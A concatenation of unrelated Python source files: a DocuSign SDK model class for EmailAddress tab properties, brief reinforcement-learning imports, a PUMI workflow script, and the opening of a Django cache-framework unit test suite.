self._anchor_case_sensitive = anchor_case_sensitive
self._anchor_horizontal_alignment = anchor_horizontal_alignment
self._anchor_ignore_if_not_present = anchor_ignore_if_not_present
self._anchor_match_whole_word = anchor_match_whole_word
self._anchor_string = anchor_string
self._anchor_units = anchor_units
self._anchor_x_offset = anchor_x_offset
self._anchor_y_offset = anchor_y_offset
self._bold = bold
self._conditional_parent_label = conditional_parent_label
self._conditional_parent_value = conditional_parent_value
self._custom_tab_id = custom_tab_id
self._document_id = document_id
self._error_details = error_details
self._font = font
self._font_color = font_color
self._font_size = font_size
self._italic = italic
self._merge_field = merge_field
self._name = name
self._page_number = page_number
self._recipient_id = recipient_id
self._status = status
self._tab_group_labels = tab_group_labels
self._tab_id = tab_id
self._tab_label = tab_label
self._tab_order = tab_order
self._template_locked = template_locked
self._template_required = template_required
self._tooltip = tooltip
self._underline = underline
self._value = value
self._x_position = x_position
self._y_position = y_position
@property
def anchor_case_sensitive(self):
"""
Gets the anchor_case_sensitive of this EmailAddress.
When set to **true**, the anchor string does not consider case when matching strings in the document. The default value is **true**.
:return: The anchor_case_sensitive of this EmailAddress.
:rtype: str
"""
return self._anchor_case_sensitive
@anchor_case_sensitive.setter
def anchor_case_sensitive(self, anchor_case_sensitive):
"""
Sets the anchor_case_sensitive of this EmailAddress.
When set to **true**, the anchor string does not consider case when matching strings in the document. The default value is **true**.
:param anchor_case_sensitive: The anchor_case_sensitive of this EmailAddress.
:type: str
"""
self._anchor_case_sensitive = anchor_case_sensitive
@property
def anchor_horizontal_alignment(self):
"""
Gets the anchor_horizontal_alignment of this EmailAddress.
Specifies the alignment of anchor tabs with anchor strings. Possible values are **left** or **right**. The default value is **left**.
:return: The anchor_horizontal_alignment of this EmailAddress.
:rtype: str
"""
return self._anchor_horizontal_alignment
@anchor_horizontal_alignment.setter
def anchor_horizontal_alignment(self, anchor_horizontal_alignment):
"""
Sets the anchor_horizontal_alignment of this EmailAddress.
Specifies the alignment of anchor tabs with anchor strings. Possible values are **left** or **right**. The default value is **left**.
:param anchor_horizontal_alignment: The anchor_horizontal_alignment of this EmailAddress.
:type: str
"""
self._anchor_horizontal_alignment = anchor_horizontal_alignment
@property
def anchor_ignore_if_not_present(self):
"""
Gets the anchor_ignore_if_not_present of this EmailAddress.
When set to **true**, this tab is ignored if anchorString is not found in the document.
:return: The anchor_ignore_if_not_present of this EmailAddress.
:rtype: str
"""
return self._anchor_ignore_if_not_present
@anchor_ignore_if_not_present.setter
def anchor_ignore_if_not_present(self, anchor_ignore_if_not_present):
"""
Sets the anchor_ignore_if_not_present of this EmailAddress.
When set to **true**, this tab is ignored if anchorString is not found in the document.
:param anchor_ignore_if_not_present: The anchor_ignore_if_not_present of this EmailAddress.
:type: str
"""
self._anchor_ignore_if_not_present = anchor_ignore_if_not_present
@property
def anchor_match_whole_word(self):
"""
Gets the anchor_match_whole_word of this EmailAddress.
When set to **true**, the anchor string in this tab matches whole words only (strings embedded in other strings are ignored.) The default value is **true**.
:return: The anchor_match_whole_word of this EmailAddress.
:rtype: str
"""
return self._anchor_match_whole_word
@anchor_match_whole_word.setter
def anchor_match_whole_word(self, anchor_match_whole_word):
"""
Sets the anchor_match_whole_word of this EmailAddress.
When set to **true**, the anchor string in this tab matches whole words only (strings embedded in other strings are ignored.) The default value is **true**.
:param anchor_match_whole_word: The anchor_match_whole_word of this EmailAddress.
:type: str
"""
self._anchor_match_whole_word = anchor_match_whole_word
@property
def anchor_string(self):
"""
Gets the anchor_string of this EmailAddress.
Anchor text information for a radio button.
:return: The anchor_string of this EmailAddress.
:rtype: str
"""
return self._anchor_string
@anchor_string.setter
def anchor_string(self, anchor_string):
"""
Sets the anchor_string of this EmailAddress.
Anchor text information for a radio button.
:param anchor_string: The anchor_string of this EmailAddress.
:type: str
"""
self._anchor_string = anchor_string
@property
def anchor_units(self):
"""
Gets the anchor_units of this EmailAddress.
Specifies units of the X and Y offset. Units could be pixels, millimeters, centimeters, or inches.
:return: The anchor_units of this EmailAddress.
:rtype: str
"""
return self._anchor_units
@anchor_units.setter
def anchor_units(self, anchor_units):
"""
Sets the anchor_units of this EmailAddress.
Specifies units of the X and Y offset. Units could be pixels, millimeters, centimeters, or inches.
:param anchor_units: The anchor_units of this EmailAddress.
:type: str
"""
self._anchor_units = anchor_units
@property
def anchor_x_offset(self):
"""
Gets the anchor_x_offset of this EmailAddress.
Specifies the X axis location of the tab, in anchorUnits, relative to the anchorString.
:return: The anchor_x_offset of this EmailAddress.
:rtype: str
"""
return self._anchor_x_offset
@anchor_x_offset.setter
def anchor_x_offset(self, anchor_x_offset):
"""
Sets the anchor_x_offset of this EmailAddress.
Specifies the X axis location of the tab, in anchorUnits, relative to the anchorString.
:param anchor_x_offset: The anchor_x_offset of this EmailAddress.
:type: str
"""
self._anchor_x_offset = anchor_x_offset
@property
def anchor_y_offset(self):
"""
Gets the anchor_y_offset of this EmailAddress.
Specifies the Y axis location of the tab, in anchorUnits, relative to the anchorString.
:return: The anchor_y_offset of this EmailAddress.
:rtype: str
"""
return self._anchor_y_offset
@anchor_y_offset.setter
def anchor_y_offset(self, anchor_y_offset):
"""
Sets the anchor_y_offset of this EmailAddress.
Specifies the Y axis location of the tab, in anchorUnits, relative to the anchorString.
:param anchor_y_offset: The anchor_y_offset of this EmailAddress.
:type: str
"""
self._anchor_y_offset = anchor_y_offset
@property
def bold(self):
"""
Gets the bold of this EmailAddress.
When set to **true**, the information in the tab is bold.
:return: The bold of this EmailAddress.
:rtype: str
"""
return self._bold
@bold.setter
def bold(self, bold):
"""
Sets the bold of this EmailAddress.
When set to **true**, the information in the tab is bold.
:param bold: The bold of this EmailAddress.
:type: str
"""
self._bold = bold
@property
def conditional_parent_label(self):
"""
Gets the conditional_parent_label of this EmailAddress.
For conditional fields this is the TabLabel of the parent tab that controls this tab's visibility.
:return: The conditional_parent_label of this EmailAddress.
:rtype: str
"""
return self._conditional_parent_label
@conditional_parent_label.setter
def conditional_parent_label(self, conditional_parent_label):
"""
Sets the conditional_parent_label of this EmailAddress.
For conditional fields this is the TabLabel of the parent tab that controls this tab's visibility.
:param conditional_parent_label: The conditional_parent_label of this EmailAddress.
:type: str
"""
self._conditional_parent_label = conditional_parent_label
@property
def conditional_parent_value(self):
"""
Gets the conditional_parent_value of this EmailAddress.
For conditional fields, this is the value of the parent tab that controls the tab's visibility. If the parent tab is a Checkbox, Radio button, Optional Signature, or Optional Initial use \"on\" as the value to show that the parent tab is active.
:return: The conditional_parent_value of this EmailAddress.
:rtype: str
"""
return self._conditional_parent_value
@conditional_parent_value.setter
def conditional_parent_value(self, conditional_parent_value):
"""
Sets the conditional_parent_value of this EmailAddress.
For conditional fields, this is the value of the parent tab that controls the tab's visibility. If the parent tab is a Checkbox, Radio button, Optional Signature, or Optional Initial use \"on\" as the value to show that the parent tab is active.
:param conditional_parent_value: The conditional_parent_value of this EmailAddress.
:type: str
"""
self._conditional_parent_value = conditional_parent_value
@property
def custom_tab_id(self):
"""
Gets the custom_tab_id of this EmailAddress.
The DocuSign generated custom tab ID for the custom tab to be applied. This can only be used when adding new tabs for a recipient. When used, the new tab inherits all the custom tab properties.
:return: The custom_tab_id of this EmailAddress.
:rtype: str
"""
return self._custom_tab_id
@custom_tab_id.setter
def custom_tab_id(self, custom_tab_id):
"""
Sets the custom_tab_id of this EmailAddress.
The DocuSign generated custom tab ID for the custom tab to be applied. This can only be used when adding new tabs for a recipient. When used, the new tab inherits all the custom tab properties.
:param custom_tab_id: The custom_tab_id of this EmailAddress.
:type: str
"""
self._custom_tab_id = custom_tab_id
@property
def document_id(self):
"""
Gets the document_id of this EmailAddress.
Specifies the document ID number that the tab is placed on. This must refer to an existing Document's ID attribute.
:return: The document_id of this EmailAddress.
:rtype: str
"""
return self._document_id
@document_id.setter
def document_id(self, document_id):
"""
Sets the document_id of this EmailAddress.
Specifies the document ID number that the tab is placed on. This must refer to an existing Document's ID attribute.
:param document_id: The document_id of this EmailAddress.
:type: str
"""
self._document_id = document_id
@property
def error_details(self):
"""
Gets the error_details of this EmailAddress.
:return: The error_details of this EmailAddress.
:rtype: ErrorDetails
"""
return self._error_details
@error_details.setter
def error_details(self, error_details):
"""
Sets the error_details of this EmailAddress.
:param error_details: The error_details of this EmailAddress.
:type: ErrorDetails
"""
self._error_details = error_details
@property
def font(self):
"""
Gets the font of this EmailAddress.
The font to be used for the tab value. Supported Fonts: Arial, Arial, ArialNarrow, Calibri, CourierNew, Garamond, Georgia, Helvetica, LucidaConsole, Tahoma, TimesNewRoman, Trebuchet, Verdana, MSGothic, MSMincho, Default.
:return: The font of this EmailAddress.
:rtype: str
"""
return self._font
@font.setter
def font(self, font):
"""
Sets the font of this EmailAddress.
The font to be used for the tab value. Supported Fonts: Arial, Arial, ArialNarrow, Calibri, CourierNew, Garamond, Georgia, Helvetica, LucidaConsole, Tahoma, TimesNewRoman, Trebuchet, Verdana, MSGothic, MSMincho, Default.
:param font: The font of this EmailAddress.
:type: str
"""
self._font = font
@property
def font_color(self):
"""
Gets the font_color of this EmailAddress.
The font color used for the information in the tab. Possible values are: Black, BrightBlue, BrightRed, DarkGreen, DarkRed, Gold, Green, NavyBlue, Purple, or White.
:return: The font_color of this EmailAddress.
:rtype: str
"""
return self._font_color
@font_color.setter
def font_color(self, font_color):
"""
Sets the font_color of this EmailAddress.
The font color used for the information in the tab. Possible values are: Black, BrightBlue, BrightRed, DarkGreen, DarkRed, Gold, Green, NavyBlue, Purple, or White.
:param font_color: The font_color of this EmailAddress.
:type: str
"""
self._font_color = font_color
@property
def font_size(self):
"""
Gets the font_size of this EmailAddress.
The font size used for the information in the tab. Possible values are: Size7, Size8, Size9, Size10, Size11, Size12, Size14, Size16, Size18, Size20, Size22, Size24, Size26, Size28, Size36, Size48, or Size72.
:return: The font_size of this EmailAddress.
:rtype: str
"""
return self._font_size
@font_size.setter
def font_size(self, font_size):
"""
Sets the font_size of this EmailAddress.
The font size used for the information in the tab. Possible values are: Size7, Size8, Size9, Size10, Size11, Size12, Size14, Size16, Size18, Size20, Size22, Size24, Size26, Size28, Size36, Size48, or Size72.
:param font_size: The font_size of this EmailAddress.
:type: str
"""
self._font_size = font_size
@property
def italic(self):
"""
Gets the italic of this EmailAddress.
When set to **true**, the information in the tab is italic.
:return: The italic of this EmailAddress.
:rtype: str
"""
return self._italic
@italic.setter
def italic(self, italic):
"""
Sets the italic of this EmailAddress.
When set to **true**, the information in the tab is italic.
:param italic: The italic of this EmailAddress.
:type: str
"""
self._italic = italic
@property
def merge_field(self):
"""
Gets the merge_field of this EmailAddress.
:return: The merge_field of this EmailAddress.
:rtype: MergeField
"""
return self._merge_field
@merge_field.setter
def merge_field(self, merge_field):
"""
Sets the merge_field of this EmailAddress.
:param merge_field: The merge_field of this EmailAddress.
:type: MergeField
"""
self._merge_field = merge_field
@property
def name(self):
"""
Gets the name of this EmailAddress.
:return: The name of this EmailAddress.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this EmailAddress.
:param name: The name of this EmailAddress.
:type: str
"""
self._name = name
@property
def page_number(self):
"""
Gets the page_number of this EmailAddress.
Specifies the page number on which the tab is located.
:return: The page_number of this EmailAddress.
:rtype: str
"""
return self._page_number
@page_number.setter
def page_number(self, page_number):
"""
Sets the page_number of this EmailAddress.
Specifies the page number on which the tab is located.
:param page_number: The page_number of this EmailAddress.
:type: str
"""
self._page_number = page_number
@property
def recipient_id(self):
"""
Gets the recipient_id of this EmailAddress.
Unique for the recipient. It is used by the tab element to indicate which recipient is to sign the Document.
:return: The recipient_id of this EmailAddress.
:rtype: str
"""
return self._recipient_id
@recipient_id.setter
def recipient_id(self, recipient_id):
"""
Sets the recipient_id of this EmailAddress.
Unique for the recipient. It is used by the tab element to indicate which recipient is to sign the Document.
:param recipient_id: The recipient_id of this EmailAddress.
:type: str
"""
self._recipient_id = recipient_id
@property
def status(self):
"""
Gets the status of this EmailAddress.
Indicates the envelope status. Valid values are: * sent - The envelope is sent to the recipients. * created - The envelope is saved as a draft and can be modified and sent later.
:return: The status of this EmailAddress.
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""
Sets the status of this EmailAddress.
Indicates the envelope status. Valid values are: * sent - The envelope is sent to the recipients. * created - The envelope is saved as a draft and can be modified and sent later.
:param status: The status of this EmailAddress.
:type: str
"""
self._status = status
@property
def tab_group_labels(self):
"""
Gets the tab_group_labels of this EmailAddress.
:return: The tab_group_labels of this EmailAddress.
:rtype: list[str]
"""
return self._tab_group_labels
@tab_group_labels.setter
def tab_group_labels(self, tab_group_labels):
"""
Sets the tab_group_labels of this EmailAddress.
:param tab_group_labels: The tab_group_labels of this EmailAddress.
:type: list[str]
"""
self._tab_group_labels = tab_group_labels
@property
def tab_id(self):
"""
Gets the tab_id of this EmailAddress.
The unique identifier for the tab. The tabid can be retrieved with the [ML:GET call].
:return: The tab_id of this EmailAddress.
:rtype: str
"""
return self._tab_id
@tab_id.setter
def tab_id(self, tab_id):
"""
Sets the tab_id of this EmailAddress.
The unique identifier for the tab. The tabid can be retrieved with the [ML:GET call].
:param tab_id: The tab_id of this EmailAddress.
:type: str
"""
self._tab_id = tab_id
@property
def tab_label(self):
"""
Gets the tab_label of this EmailAddress.
The label string associated with the tab.
:return: The tab_label of this EmailAddress.
:rtype: str
"""
return self._tab_label
@tab_label.setter
def tab_label(self, tab_label):
"""
Sets the tab_label of this EmailAddress.
The label string associated with the tab.
:param tab_label: The tab_label of this EmailAddress.
:type: str
"""
self._tab_label = tab_label
@property
def tab_order(self):
"""
Gets the tab_order of this EmailAddress.
:return: The tab_order of this EmailAddress.
:rtype: str
"""
return self._tab_order
@tab_order.setter
def tab_order(self, tab_order):
"""
Sets the tab_order of this EmailAddress.
:param tab_order: The tab_order of this EmailAddress.
:type: str
"""
self._tab_order = tab_order
@property
def template_locked(self):
"""
Gets the template_locked of this EmailAddress.
When set to **true**, the sender cannot change any attributes of the recipient. Used only when working with template recipients.
:return: The template_locked of this EmailAddress.
:rtype: str
"""
return self._template_locked
@template_locked.setter
def template_locked(self, template_locked):
"""
Sets the template_locked of this EmailAddress.
When set to **true**, the sender cannot change any attributes of the recipient. Used only when working with template recipients.
:param template_locked: The template_locked of this EmailAddress.
:type: str
"""
self._template_locked = template_locked
@property
def template_required(self):
"""
Gets the template_required of this EmailAddress.
When set to **true**, the sender may not remove the recipient. Used only when working with template recipients.
:return: The template_required of this EmailAddress.
:rtype: str
"""
return self._template_required
@template_required.setter
def template_required(self, template_required):
"""
Sets the template_required of this EmailAddress.
When set to **true**, the sender may not remove the recipient. Used only when working with template recipients.
:param template_required: The template_required of this EmailAddress.
:type: str
"""
self._template_required = template_required
@property
def tooltip(self):
"""
Gets the tooltip of this EmailAddress.
:return: The tooltip of this EmailAddress.
:rtype: str
"""
return self._tooltip
@tooltip.setter
def tooltip(self, tooltip):
"""
Sets the tooltip of this EmailAddress.
:param tooltip: The tooltip of this EmailAddress.
:type: str
"""
self._tooltip = tooltip
@property
def underline(self):
"""
Gets the underline of this EmailAddress.
When set to **true**, the information in the tab is underlined.
:return: The underline of this EmailAddress.
:rtype: str
"""
return self._underline
@underline.setter
def underline(self, underline):
"""
Sets the underline of this EmailAddress.
When set to **true**, the information in the tab is underlined.
:param underline: The underline of this EmailAddress.
:type: str
"""
self._underline = underline
@property
def value(self):
"""
Gets the value of this EmailAddress.
Specifies the value of the tab.
:return: The value of this EmailAddress.
:rtype: str
"""
return self._value
@value.setter
def value(self, value):
"""
Sets the value of this EmailAddress.
Specifies the value of the tab.
:param value: The value of this EmailAddress.
:type: str
"""
self._value = value
@property
def x_position(self):
"""
Gets the x_position of this EmailAddress.
This indicates the horizontal offset of the object on the page. DocuSign uses 72 DPI when determining position.
:return: The x_position of this EmailAddress.
:rtype: str
"""
return self._x_position
@x_position.setter
def x_position(self, x_position):
"""
Sets the x_position of this EmailAddress.
This indicates the horizontal offset of the object on the page. DocuSign uses 72 DPI when determining position.
:param x_position: The x_position of this EmailAddress.
:type: str
"""
self._x_position = x_position
@property
def y_position(self):
"""
Gets the y_position of this EmailAddress.
This indicates the vertical offset of the object on the page. DocuSign uses 72 DPI when determining position.
:return: The y_position of this EmailAddress.
:rtype: str
"""
return self._y_position
@y_position.setter
def y_position(self, y_position):
"""
Sets the y_position of this EmailAddress.
This indicates the vertical offset of the object on the page. DocuSign uses 72 DPI when determining position.
:param y_position: The y_position of this EmailAddress.
:type: str
"""
self._y_position = y_position
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
from rldqn import DQN, FCNet, RandomLearner
from rlddpg import DDPG
|
#!/usr/bin/env python
import PUMI.utils.Concat as conc
conc=conc.concat_workflow(2)
conc.inputs.inputspec.par1="abc"
conc.inputs.inputspec.par2="def"
conc.write_graph('graph-orig.dot', graph2use='orig', simple_form=True);
conc.write_graph('graph-exec-detailed.dot', graph2use='exec', simple_form=False);
conc.write_graph('graph.dot', graph2use='colored');
conc.run()
|
# -*- coding: utf-8 -*-
# Most of this file was copied from:
# https://raw.githubusercontent.com/django/django/1.11.12/tests/cache/tests.py
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import copy
import io
import os
import re
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import close_old_connections, connection, connections
from django.http import (
HttpRequest, HttpResponse, HttpResponseNotModified, StreamingHttpResponse,
)
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
ignore_warnings, mock, override_settings,
)
from django.test.signals import setting_changed
from django.utils import six, timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control,
patch_response_headers, patch_vary_headers,
)
from django.utils.deprecation import RemovedInDjango21Warning
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
################################################################################
# Setup Django for models import.
################################################################################
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tests.settings')
############################################################################
# GrantJ 2017-03-27 Ignore deprecation warnings. Django's metaclass magic does
# not always play well with Python 3.6. Read
# http://stackoverflow.com/questions/41343263/ for details
############################################################################
import warnings
warnings.filterwarnings('ignore', category=DeprecationWarning)
import django
django.setup()
from .models import Poll, expensive_calculation
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpicklable(object):
def __getstate__(self):
raise pickle.PickleError()
class UnpicklableType(object):
# Unpicklable using the default pickling protocol on Python 2.
__slots__ = 'a',
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
def custom_key_func2(key, key_prefix, version):
"Another customized cache key function"
return '-'.join(['CUSTOM', key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': custom_key_func2},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, exclude=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `exclude` is a set of cache names denoting which `_caches_setting_base` keys
# should be omitted.
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
exclude = exclude or set()
setting = {k: base.copy() for k in _caches_setting_base.keys() if k not in exclude}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertDictEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertDictEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_touch(self):
# cache.touch() updates the timeout.
cache.set('expire1', 'very quickly', timeout=1)
self.assertTrue(cache.touch('expire1', timeout=2))
time.sleep(1)
self.assertTrue(cache.has_key('expire1'))
time.sleep(2)
self.assertFalse(cache.has_key('expire1'))
# cache.touch() works without the timeout argument.
cache.set('expire1', 'very quickly', timeout=1)
self.assertTrue(cache.touch('expire1'))
time.sleep(2)
self.assertTrue(cache.has_key('expire1'))
self.assertFalse(cache.touch('nonexistent'))
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
"""
Followe memcached's convention where a timeout greater than 30 days is
treated as an absolute expiration timestamp instead of a relative
offset (#12399).
"""
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
"""
Passing in None into timeout results in a value that is cached forever
"""
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertIs(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
cache.set('key5', 'belgian fries', timeout=1)
cache.touch('key5', timeout=None)
time.sleep(2)
self.assertEqual(cache.get('key5'), 'belgian fries')
def test_zero_timeout(self):
"""
Passing in zero into timeout results in a value that is not cached
"""
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
